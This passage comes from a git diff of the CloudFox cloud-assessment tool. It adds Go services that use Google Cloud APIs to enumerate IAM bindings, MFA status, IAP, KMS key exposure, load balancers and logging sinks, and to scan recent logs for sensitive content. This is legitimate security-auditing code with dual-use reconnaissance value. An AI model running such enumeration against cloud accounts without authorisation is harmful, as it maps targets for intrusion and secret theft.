EnhancedIAMData struct { + ScopeBindings []ScopeBinding `json:"scopeBindings"` + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + CustomRoles []CustomRole `json:"customRoles"` + Groups []GroupInfo `json:"groups"` + MFAStatus map[string]*MFAStatus `json:"mfaStatus"` +} + +// CombinedIAMEnhanced retrieves all IAM-related data including org/folder bindings +func (s *IAMService) CombinedIAMEnhanced(ctx context.Context, projectIDs []string, projectNames map[string]string) (EnhancedIAMData, error) { + var data EnhancedIAMData + data.MFAStatus = make(map[string]*MFAStatus) + + // Get all scope bindings (org, folder, project) + scopeBindings, err := s.GetAllScopeIAM(ctx, projectIDs, projectNames) + if err != nil { + return data, fmt.Errorf("failed to get scope bindings: %v", err) + } + data.ScopeBindings = scopeBindings + + // Collect unique user emails for MFA lookup + userEmails := make(map[string]bool) + for _, sb := range scopeBindings { + if sb.MemberType == "User" { + userEmails[sb.MemberEmail] = true + } + } + + // Get MFA status for users (best effort) + var emailList []string + for email := range userEmails { + emailList = append(emailList, email) + } + data.MFAStatus = s.GetBulkMFAStatus(ctx, emailList) + + // Get service accounts and custom roles for each project + for _, projectID := range projectIDs { + // Service accounts (without keys) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) + if err == nil { + data.ServiceAccounts = append(data.ServiceAccounts, serviceAccounts...) + } + + // Custom roles + customRoles, err := s.CustomRoles(projectID) + if err == nil { + data.CustomRoles = append(data.CustomRoles, customRoles...) + } + } + + // Extract groups from scope bindings + groupMap := make(map[string]*GroupInfo) + for _, sb := range scopeBindings { + if sb.MemberType == "Group" { + if _, exists := groupMap[sb.MemberEmail]; !exists { + groupMap[sb.MemberEmail] = &GroupInfo{ + Email: sb.MemberEmail, + ProjectID: sb.ScopeID, // Use first scope where seen + Roles: []string{}, + } + } + groupMap[sb.MemberEmail].Roles = append(groupMap[sb.MemberEmail].Roles, sb.Role) + } + } + for _, g := range groupMap { + data.Groups = append(data.Groups, *g) + } + + return data, nil +} diff --git a/gcp/services/iapService/iapService.go b/gcp/services/iapService/iapService.go new file mode 100644 index 00000000..a7394a58 --- /dev/null +++ b/gcp/services/iapService/iapService.go @@ -0,0 +1,172 @@ +package iapservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + iap "google.golang.org/api/iap/v1" +) + +type IAPService struct { + session *gcpinternal.SafeSession +} + +func New() *IAPService { + return &IAPService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *IAPService { + return &IAPService{session: session} +} + +// getService returns an IAP service client using cached session if available +func (s *IAPService) getService(ctx context.Context) (*iap.Service, error) { + if s.session != nil { + return sdk.CachedGetIAPService(ctx, s.session) + } + return iap.NewService(ctx) +} + +// IAPSettingsInfo represents IAP settings for a resource +type IAPSettingsInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + ResourceType string `json:"resourceType"` // compute, app-engine, etc. + ResourceName string `json:"resourceName"` + IAPEnabled bool `json:"iapEnabled"` + OAuth2ClientID string `json:"oauth2ClientId"` + OAuth2ClientSecretSha string `json:"oauth2ClientSecretSha"` + AccessDeniedPageURI string `json:"accessDeniedPageUri"` + CORSAllowedOrigins []string `json:"corsAllowedOrigins"` + GCIPTenantIDs []string `json:"gcipTenantIds"` + ReauthPolicy string `json:"reauthPolicy"` +} + +// TunnelDestGroup represents an IAP tunnel destination group +type TunnelDestGroup struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + CIDRs []string `json:"cidrs"` + FQDNs []string `json:"fqdns"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ListTunnelDestGroups retrieves tunnel destination groups +func (s *IAPService) ListTunnelDestGroups(projectID string) ([]TunnelDestGroup, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + var groups []TunnelDestGroup + + // Get regions from regionService (with automatic fallback) + // Also try "-" wildcard in case it's supported + regions := regionservice.GetCachedRegionNames(ctx, projectID) + regions = append(regions, "-") + + for _, region := range regions { + parent := fmt.Sprintf("projects/%s/iap_tunnel/locations/%s", projectID, region) + resp, err := service.Projects.IapTunnel.Locations.DestGroups.List(parent).Context(ctx).Do() + if err != nil { + continue + } + + for _, group := range resp.TunnelDestGroups { + info := TunnelDestGroup{ + Name: extractName(group.Name), + ProjectID: projectID, + Region: region, + CIDRs: group.Cidrs, + FQDNs: group.Fqdns, + } + + // Fetch IAM bindings for this tunnel dest group + info.IAMBindings = s.getTunnelDestGroupIAMBindings(service, group.Name) + + groups = append(groups, info) + } + } + + return groups, nil +} + +// getTunnelDestGroupIAMBindings retrieves IAM bindings for a tunnel destination group +func (s *IAPService) getTunnelDestGroupIAMBindings(service *iap.Service, resourceName string) []IAMBinding { + ctx := context.Background() + + policy, err := service.V1.GetIamPolicy(resourceName, &iap.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []IAMBinding + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +// GetIAPSettings retrieves IAP settings for a resource +func (s *IAPService) GetIAPSettings(projectID, resourcePath string) (*IAPSettingsInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + settings, err := service.V1.GetIapSettings(resourcePath).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + info := &IAPSettingsInfo{ + Name: settings.Name, + ProjectID: projectID, + ResourceName: resourcePath, + } + + if settings.AccessSettings != nil { + if settings.AccessSettings.OauthSettings != nil { + info.OAuth2ClientID = settings.AccessSettings.OauthSettings.LoginHint + } + // CorsSettings doesn't have AllowHttpOptions as a list - it's a bool + // Skip CORS parsing for now + if settings.AccessSettings.GcipSettings != nil { + info.GCIPTenantIDs = settings.AccessSettings.GcipSettings.TenantIds + } + if settings.AccessSettings.ReauthSettings != nil { + info.ReauthPolicy = settings.AccessSettings.ReauthSettings.Method + } + } + + return info, nil +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/kmsService/kmsService.go b/gcp/services/kmsService/kmsService.go new file mode 100644 index 00000000..a3d3bec8 --- /dev/null +++ b/gcp/services/kmsService/kmsService.go @@ -0,0 +1,297 @@ +package kmsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + kms "google.golang.org/api/cloudkms/v1" +) + +type KMSService struct{ + session *gcpinternal.SafeSession +} + +func New() *KMSService { + return &KMSService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *KMSService { + return &KMSService{ + session: session, + } +} + +// getService returns a KMS service client using cached session if available +func (ks *KMSService) getService(ctx context.Context) (*kms.Service, error) { + if ks.session != nil { + return sdk.CachedGetKMSService(ctx, ks.session) + } + return kms.NewService(ctx) +} + +// KeyRingInfo holds KMS key ring details +type KeyRingInfo struct { + Name string + ProjectID string + Location string + CreateTime string + + // Keys in this key ring + KeyCount int +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// CryptoKeyInfo holds KMS crypto key details with security-relevant information +type CryptoKeyInfo struct { + Name string + ProjectID string + Location string + KeyRing string + Purpose string // ENCRYPT_DECRYPT, ASYMMETRIC_SIGN, ASYMMETRIC_DECRYPT, MAC + CreateTime string + + // Version info + PrimaryVersion string + PrimaryState string + VersionCount int + + // Security configuration + RotationPeriod string + NextRotationTime string + DestroyScheduledDuration string + ProtectionLevel string // SOFTWARE, HSM, EXTERNAL, EXTERNAL_VPC + + // Import info (indicates external key import) + ImportOnly bool + + // Labels + Labels map[string]string + + // IAM + IAMBindings []IAMBinding + IsPublicEncrypt bool + IsPublicDecrypt bool +} + +// KeyRings retrieves all KMS key rings in a project +func (ks *KMSService) KeyRings(projectID string) ([]KeyRingInfo, error) { + ctx := context.Background() + + service, err := ks.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + var keyRings []KeyRingInfo + + // List key rings across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.KeyRings.List(parent) + err = call.Pages(ctx, func(page *kms.ListKeyRingsResponse) error { + for _, kr := range page.KeyRings { + info := parseKeyRingInfo(kr, projectID) + + // Get key count for this key ring + keyCount, _ := ks.getKeyCount(service, kr.Name) + info.KeyCount = keyCount + + keyRings = append(keyRings, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + return keyRings, nil +} + +// CryptoKeys retrieves all crypto keys in a project +func (ks *KMSService) CryptoKeys(projectID string) ([]CryptoKeyInfo, error) { + ctx := context.Background() + + service, err := ks.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + var keys []CryptoKeyInfo + + // First get all key rings + keyRings, err := ks.KeyRings(projectID) + if err != nil { + return nil, err + } + + // Then get keys from each key ring + for _, kr := range keyRings { + keyRingName := fmt.Sprintf("projects/%s/locations/%s/keyRings/%s", projectID, kr.Location, kr.Name) + + call := service.Projects.Locations.KeyRings.CryptoKeys.List(keyRingName) + err = call.Pages(ctx, func(page *kms.ListCryptoKeysResponse) error { + for _, key := range page.CryptoKeys { + info := parseCryptoKeyInfo(key, projectID, kr.Location, kr.Name) + + // Try to get IAM policy + iamPolicy, iamErr := ks.getKeyIAMPolicy(service, key.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, info.IsPublicEncrypt, info.IsPublicDecrypt = parseKeyBindings(iamPolicy) + } + + keys = append(keys, info) + } + return nil + }) + + if err != nil { + // Log but continue with other key rings + _ = err // Error from listing keys in this key ring - permission or API issue + continue + } + } + + return keys, nil +} + +// parseKeyRingInfo extracts relevant information from a KMS key ring +func parseKeyRingInfo(kr *kms.KeyRing, projectID string) KeyRingInfo { + info := KeyRingInfo{ + Name: extractName(kr.Name), + ProjectID: projectID, + CreateTime: kr.CreateTime, + } + + // Extract location from key ring name + // Format: projects/{project}/locations/{location}/keyRings/{keyRing} + parts := strings.Split(kr.Name, "/") + if len(parts) >= 4 { + info.Location = parts[3] + } + + return info +} + +// parseCryptoKeyInfo extracts relevant information from a KMS crypto key +func parseCryptoKeyInfo(key *kms.CryptoKey, projectID, location, keyRing string) CryptoKeyInfo { + info := CryptoKeyInfo{ + Name: extractName(key.Name), + ProjectID: projectID, + Location: location, + KeyRing: keyRing, + Purpose: key.Purpose, + CreateTime: key.CreateTime, + Labels: key.Labels, + ImportOnly: key.ImportOnly, + } + + // Rotation configuration + if key.RotationPeriod != "" { + info.RotationPeriod = key.RotationPeriod + } + if key.NextRotationTime != "" { + info.NextRotationTime = key.NextRotationTime + } + + // Destroy scheduled duration + if key.DestroyScheduledDuration != "" { + info.DestroyScheduledDuration = key.DestroyScheduledDuration + } + + // Primary version info + if key.Primary != nil { + info.PrimaryVersion = extractVersionNumber(key.Primary.Name) + info.PrimaryState = key.Primary.State + info.ProtectionLevel = key.Primary.ProtectionLevel + } + + // Version template for protection level + if info.ProtectionLevel == "" && key.VersionTemplate != nil { + info.ProtectionLevel = key.VersionTemplate.ProtectionLevel + } + + return info +} + +// getKeyCount gets the number of crypto keys in a key ring +func (ks *KMSService) getKeyCount(service *kms.Service, keyRingName string) (int, error) { + ctx := context.Background() + count := 0 + + call := service.Projects.Locations.KeyRings.CryptoKeys.List(keyRingName) + err := call.Pages(ctx, func(page *kms.ListCryptoKeysResponse) error { + count += len(page.CryptoKeys) + return nil + }) + + if err != nil { + return 0, err + } + + return count, nil +} + +// getKeyIAMPolicy retrieves the IAM policy for a crypto key +func (ks *KMSService) getKeyIAMPolicy(service *kms.Service, keyName string) (*kms.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.KeyRings.CryptoKeys.GetIamPolicy(keyName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseKeyBindings extracts all IAM bindings and checks for public access +func parseKeyBindings(policy *kms.Policy) (bindings []IAMBinding, publicEncrypt bool, publicDecrypt bool) { + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + + // Check for public access on encrypt/decrypt roles + if member == "allUsers" || member == "allAuthenticatedUsers" { + switch binding.Role { + case "roles/cloudkms.cryptoKeyEncrypter": + publicEncrypt = true + case "roles/cloudkms.cryptoKeyDecrypter": + publicDecrypt = true + case "roles/cloudkms.cryptoKeyEncrypterDecrypter": + publicEncrypt = true + publicDecrypt = true + } + } + } + } + return +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// extractVersionNumber extracts the version number from a crypto key version name +func extractVersionNumber(versionName string) string { + parts := strings.Split(versionName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return versionName +} diff --git a/gcp/services/loadbalancerService/loadbalancerService.go b/gcp/services/loadbalancerService/loadbalancerService.go new file mode 100644 index 00000000..3ac8d6cb --- /dev/null +++ b/gcp/services/loadbalancerService/loadbalancerService.go @@ -0,0 +1,276 @@ +package loadbalancerservice + +import ( + "context" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + compute "google.golang.org/api/compute/v1" +) + +type LoadBalancerService struct { + session *gcpinternal.SafeSession +} + +func New() *LoadBalancerService { + return &LoadBalancerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *LoadBalancerService { + return &LoadBalancerService{session: session} +} + +// getService returns a Compute service client using cached session if available +func (s *LoadBalancerService) getService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// LoadBalancerInfo represents a load balancer configuration +type LoadBalancerInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Type string `json:"type"` // HTTP, HTTPS, TCP, SSL, UDP, INTERNAL + Scheme string `json:"scheme"` // EXTERNAL, INTERNAL + Region string `json:"region"` // global or regional + IPAddress string `json:"ipAddress"` + Port string `json:"port"` + Protocol string `json:"protocol"` + + // Backend info + BackendServices []string `json:"backendServices"` + BackendBuckets []string `json:"backendBuckets"` + HealthChecks []string `json:"healthChecks"` + + // SSL/TLS config + SSLPolicy string `json:"sslPolicy"` + SSLCertificates []string `json:"sslCertificates"` + MinTLSVersion string `json:"minTlsVersion"` + + // Security config + SecurityPolicy string `json:"securityPolicy"` // Cloud Armor +} + +// SSLPolicyInfo represents an SSL policy +type SSLPolicyInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + MinTLSVersion string `json:"minTlsVersion"` + Profile string `json:"profile"` // COMPATIBLE, MODERN, RESTRICTED, CUSTOM + CustomFeatures []string `json:"customFeatures"` +} + +// BackendServiceInfo represents a backend service +type BackendServiceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Protocol string `json:"protocol"` + Port int64 `json:"port"` + HealthCheck string `json:"healthCheck"` + SecurityPolicy string `json:"securityPolicy"` + EnableCDN bool `json:"enableCdn"` + SessionAffinity string `json:"sessionAffinity"` + ConnectionDraining int64 `json:"connectionDraining"` + Backends []string `json:"backends"` +} + +// ListLoadBalancers retrieves all load balancers in a project +func (s *LoadBalancerService) ListLoadBalancers(projectID string) ([]LoadBalancerInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var loadBalancers []LoadBalancerInfo + + // Get global forwarding rules (external HTTP(S), SSL Proxy, TCP Proxy) + globalFwdRules, err := service.GlobalForwardingRules.List(projectID).Context(ctx).Do() + if err == nil { + for _, rule := range globalFwdRules.Items { + lb := s.parseForwardingRule(rule, projectID, "global") + loadBalancers = append(loadBalancers, lb) + } + } + + // Get all regional forwarding rules using AggregatedList (internal, network LB) + // This only requires compute.forwardingRules.list permission (not compute.regions.list) + req := service.ForwardingRules.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.ForwardingRules == nil { + continue + } + // Extract region from scope name (format: "regions/us-central1") + region := "unknown" + if strings.HasPrefix(scopeName, "regions/") { + region = strings.TrimPrefix(scopeName, "regions/") + } + for _, rule := range scopedList.ForwardingRules { + lb := s.parseForwardingRule(rule, projectID, region) + loadBalancers = append(loadBalancers, lb) + } + } + return nil + }) + // Ignore errors - we still return what we found from global rules + + return loadBalancers, nil +} + +// ListSSLPolicies retrieves all SSL policies +func (s *LoadBalancerService) ListSSLPolicies(projectID string) ([]SSLPolicyInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var policies []SSLPolicyInfo + + resp, err := service.SslPolicies.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, policy := range resp.Items { + info := SSLPolicyInfo{ + Name: policy.Name, + ProjectID: projectID, + MinTLSVersion: policy.MinTlsVersion, + Profile: policy.Profile, + CustomFeatures: policy.CustomFeatures, + } + policies = append(policies, info) + } + + return policies, nil +} + +// ListBackendServices retrieves all backend services +func (s *LoadBalancerService) ListBackendServices(projectID string) ([]BackendServiceInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var backends []BackendServiceInfo + + // Get all backend services (global and regional) using AggregatedList + // This only requires compute.backendServices.list permission (not compute.regions.list) + req := service.BackendServices.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.BackendServiceAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.BackendServices == nil { + continue + } + // Extract region from scope name (format: "regions/us-central1" or "global") + region := "global" + if strings.HasPrefix(scopeName, "regions/") { + region = strings.TrimPrefix(scopeName, "regions/") + } + for _, backend := range scopedList.BackendServices { + var info BackendServiceInfo + if region == "global" { + info = s.parseBackendService(backend, projectID) + } else { + info = s.parseRegionalBackendService(backend, projectID, region) + } + backends = append(backends, info) + } + } + return nil + }) + // Ignore errors - return empty list if we can't access + + return backends, nil +} + +func (s *LoadBalancerService) parseForwardingRule(rule *compute.ForwardingRule, projectID, region string) LoadBalancerInfo { + info := LoadBalancerInfo{ + Name: rule.Name, + ProjectID: projectID, + Region: region, + IPAddress: rule.IPAddress, + Port: rule.PortRange, + Protocol: rule.IPProtocol, + } + + // Determine load balancer type + if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { + info.Scheme = "EXTERNAL" + } else { + info.Scheme = "INTERNAL" + } + + // Determine type based on target + if rule.Target != "" { + if strings.Contains(rule.Target, "targetHttpProxies") { + info.Type = "HTTP" + } else if strings.Contains(rule.Target, "targetHttpsProxies") { + info.Type = "HTTPS" + } else if strings.Contains(rule.Target, "targetSslProxies") { + info.Type = "SSL_PROXY" + } else if strings.Contains(rule.Target, "targetTcpProxies") { + info.Type = "TCP_PROXY" + } else if strings.Contains(rule.Target, "targetPools") { + info.Type = "NETWORK" + } else if strings.Contains(rule.Target, "targetGrpcProxies") { + info.Type = "GRPC" + } + } else if rule.BackendService != "" { + info.Type = "INTERNAL" + info.BackendServices = []string{extractName(rule.BackendService)} + } + + return info +} + +func (s *LoadBalancerService) parseBackendService(backend *compute.BackendService, projectID string) BackendServiceInfo { + info := BackendServiceInfo{ + Name: backend.Name, + ProjectID: projectID, + Protocol: backend.Protocol, + Port: backend.Port, + EnableCDN: backend.EnableCDN, + SessionAffinity: backend.SessionAffinity, + } + + if backend.SecurityPolicy != "" { + info.SecurityPolicy = extractName(backend.SecurityPolicy) + } + + if len(backend.HealthChecks) > 0 { + info.HealthCheck = extractName(backend.HealthChecks[0]) + } + + if backend.ConnectionDraining != nil { + info.ConnectionDraining = backend.ConnectionDraining.DrainingTimeoutSec + } + + for _, be := range backend.Backends { + info.Backends = append(info.Backends, extractName(be.Group)) + } + + return info +} + +func (s *LoadBalancerService) parseRegionalBackendService(backend *compute.BackendService, projectID, region string) BackendServiceInfo { + info := s.parseBackendService(backend, projectID) + return info +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/logEnumService/logEnumService.go b/gcp/services/logEnumService/logEnumService.go new file mode 100644 index 00000000..48ffd432 --- /dev/null +++ b/gcp/services/logEnumService/logEnumService.go @@ -0,0 +1,171 @@ +package logenumservice + +import ( + "context" + "encoding/json" + "fmt" + "time" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + logging "google.golang.org/api/logging/v2" +) + +type LogEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *LogEnumService { + return &LogEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *LogEnumService { + return &LogEnumService{session: session} +} + +// SensitiveLogEntry represents a log entry containing potentially sensitive content. +type SensitiveLogEntry struct { + ProjectID string `json:"projectId"` + LogName string `json:"logName"` + Timestamp string `json:"timestamp"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` + Snippet string `json:"snippet"` + ResourceType string `json:"resourceType"` + InsertID string `json:"insertId"` +} + +// getLoggingService returns a Logging service client. +func (s *LogEnumService) getLoggingService(ctx context.Context) (*logging.Service, error) { + // The REST API client doesn't use the same cached SDK pattern. + // Create directly since the logging SDK client isn't session-aware in the same way. + return logging.NewService(ctx) +} + +// EnumerateSensitiveLogs reads log entries and checks for sensitive content. +func (s *LogEnumService) EnumerateSensitiveLogs(projectID string, hours int, maxEntries int, logNameFilter string) ([]SensitiveLogEntry, error) { + ctx := context.Background() + + service, err := s.getLoggingService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + patterns := shared.GetContentPatterns() + + // Build the filter + cutoff := time.Now().UTC().Add(-time.Duration(hours) * time.Hour) + filter := fmt.Sprintf("timestamp >= \"%s\"", cutoff.Format(time.RFC3339)) + if logNameFilter != "" { + filter += fmt.Sprintf(" AND logName = \"projects/%s/logs/%s\"", projectID, logNameFilter) + } + + var sensitiveEntries []SensitiveLogEntry + totalProcessed := 0 + pageToken := "" + + for { + if maxEntries > 0 && totalProcessed >= maxEntries { + break + } + + pageSize := int64(1000) + remaining := maxEntries - totalProcessed + if maxEntries > 0 && remaining < int(pageSize) { + pageSize = int64(remaining) + } + + req := &logging.ListLogEntriesRequest{ + ResourceNames: []string{fmt.Sprintf("projects/%s", projectID)}, + Filter: filter, + OrderBy: "timestamp desc", + PageSize: pageSize, + PageToken: pageToken, + } + + resp, err := service.Entries.List(req).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + for _, entry := range resp.Entries { + totalProcessed++ + + // Extract text content from the entry + text := extractEntryText(entry) + if text == "" { + continue + } + + matches := shared.MatchContent(text, patterns) + for _, match := range matches { + // Extract short log name + logName := entry.LogName + resourceType := "" + if entry.Resource != nil { + resourceType = entry.Resource.Type + } + + sensitiveEntries = append(sensitiveEntries, SensitiveLogEntry{ + ProjectID: projectID, + LogName: logName, + Timestamp: entry.Timestamp, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: match.Description, + Snippet: truncate(match.Snippet, 200), + ResourceType: resourceType, + InsertID: entry.InsertId, + }) + break // One match per entry is sufficient + } + } + + pageToken = resp.NextPageToken + if pageToken == "" { + break + } + } + + return sensitiveEntries, nil +} + +// extractEntryText pulls all text content from a log entry for scanning. +func extractEntryText(entry *logging.LogEntry) string { + if entry == nil { + return "" + } + + var text string + + // textPayload is the simplest + if entry.TextPayload != "" { + text += entry.TextPayload + "\n" + } + + // jsonPayload - serialize to string for scanning + if entry.JsonPayload != nil { + jsonBytes, err := json.Marshal(entry.JsonPayload) + if err == nil { + text += string(jsonBytes) + "\n" + } + } + + // protoPayload - serialize to string for scanning + if entry.ProtoPayload != nil { + jsonBytes, err := json.Marshal(entry.ProtoPayload) + if err == nil { + text += string(jsonBytes) + "\n" + } + } + + return text +} + +func truncate(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + return s[:maxLen] + "..." +} diff --git a/gcp/services/loggingService/loggingService.go b/gcp/services/loggingService/loggingService.go new file mode 100644 index 00000000..d0c8dfaa --- /dev/null +++ b/gcp/services/loggingService/loggingService.go @@ -0,0 +1,576 @@ +package loggingservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + logging "google.golang.org/api/logging/v2" + sqladmin "google.golang.org/api/sqladmin/v1beta4" + storage "google.golang.org/api/storage/v1" +) + +type LoggingService struct{ + session *gcpinternal.SafeSession +} + +func New() *LoggingService { + return &LoggingService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *LoggingService { + return &LoggingService{ + session: session, + } +} + +// getService returns a Logging service client using cached session if available +func (ls *LoggingService) getService(ctx context.Context) (*logging.Service, error) { + if ls.session != nil { + return sdk.CachedGetLoggingService(ctx, ls.session) + } + return logging.NewService(ctx) +} + +// SinkInfo holds Cloud Logging sink details with security-relevant information +type SinkInfo struct { + Name string + ProjectID string + Description string + CreateTime string + UpdateTime string + + // Destination configuration + Destination string // Full destination resource name + DestinationType string // bigquery, storage, pubsub, logging + DestinationBucket string // For storage destinations + DestinationDataset string // For BigQuery destinations + DestinationTopic string // For Pub/Sub destinations + DestinationProject string // Project containing the destination + + // Filter + Filter string + Disabled bool + + // Export identity + WriterIdentity string // Service account that writes to destination + + // Inclusion/exclusion + ExclusionFilters []string + + // Cross-project indicator + IsCrossProject bool +} + +// MetricInfo holds log-based metric details +type MetricInfo struct { + Name string + ProjectID string + Description string + Filter string + CreateTime string + UpdateTime string + + // Metric configuration + MetricKind string // DELTA, GAUGE, CUMULATIVE + ValueType string // INT64, DOUBLE, DISTRIBUTION + + // Labels extracted from logs + LabelCount int +} + +// Sinks retrieves all logging sinks in a project +func (ls *LoggingService) Sinks(projectID string) ([]SinkInfo, error) { + ctx := context.Background() + + service, err := ls.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + var sinks []SinkInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Sinks.List(parent) + err = call.Pages(ctx, func(page *logging.ListSinksResponse) error { + for _, sink := range page.Sinks { + info := parseSinkInfo(sink, projectID) + sinks = append(sinks, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + return sinks, nil +} + +// Metrics retrieves all log-based metrics in a project +func (ls *LoggingService) Metrics(projectID string) ([]MetricInfo, error) { + ctx := context.Background() + + service, err := ls.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + var metrics []MetricInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Metrics.List(parent) + err = call.Pages(ctx, func(page *logging.ListLogMetricsResponse) error { + for _, metric := range page.Metrics { + info := parseMetricInfo(metric, projectID) + metrics = append(metrics, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + return metrics, nil +} + +// parseSinkInfo extracts relevant information from a logging sink +func parseSinkInfo(sink *logging.LogSink, projectID string) SinkInfo { + info := SinkInfo{ + Name: sink.Name, + ProjectID: projectID, + Description: sink.Description, + CreateTime: sink.CreateTime, + UpdateTime: sink.UpdateTime, + Destination: sink.Destination, + Filter: sink.Filter, + Disabled: sink.Disabled, + WriterIdentity: sink.WriterIdentity, + } + + // Parse destination type and details + info.DestinationType, info.DestinationProject = parseDestination(sink.Destination) + + switch info.DestinationType { + case "storage": + info.DestinationBucket = extractBucketName(sink.Destination) + case "bigquery": + info.DestinationDataset = extractDatasetName(sink.Destination) + case "pubsub": + info.DestinationTopic = extractTopicName(sink.Destination) + } + + // Check if cross-project + if info.DestinationProject != "" && info.DestinationProject != projectID { + info.IsCrossProject = true + } + + // Parse exclusion filters + for _, exclusion := range sink.Exclusions { + if !exclusion.Disabled { + info.ExclusionFilters = append(info.ExclusionFilters, exclusion.Filter) + } + } + + return info +} + +// parseMetricInfo extracts relevant information from a log-based metric +func parseMetricInfo(metric *logging.LogMetric, projectID string) MetricInfo { + info := MetricInfo{ + Name: metric.Name, + ProjectID: projectID, + Description: metric.Description, + Filter: metric.Filter, + CreateTime: metric.CreateTime, + UpdateTime: metric.UpdateTime, + } + + if metric.MetricDescriptor != nil { + info.MetricKind = metric.MetricDescriptor.MetricKind + info.ValueType = metric.MetricDescriptor.ValueType + info.LabelCount = len(metric.MetricDescriptor.Labels) + } + + return info +} + +// parseDestination parses the destination resource name +func parseDestination(destination string) (destType string, project string) { + switch { + case strings.HasPrefix(destination, "storage.googleapis.com/"): + destType = "storage" + // Format: storage.googleapis.com/bucket-name + parts := strings.Split(destination, "/") + if len(parts) 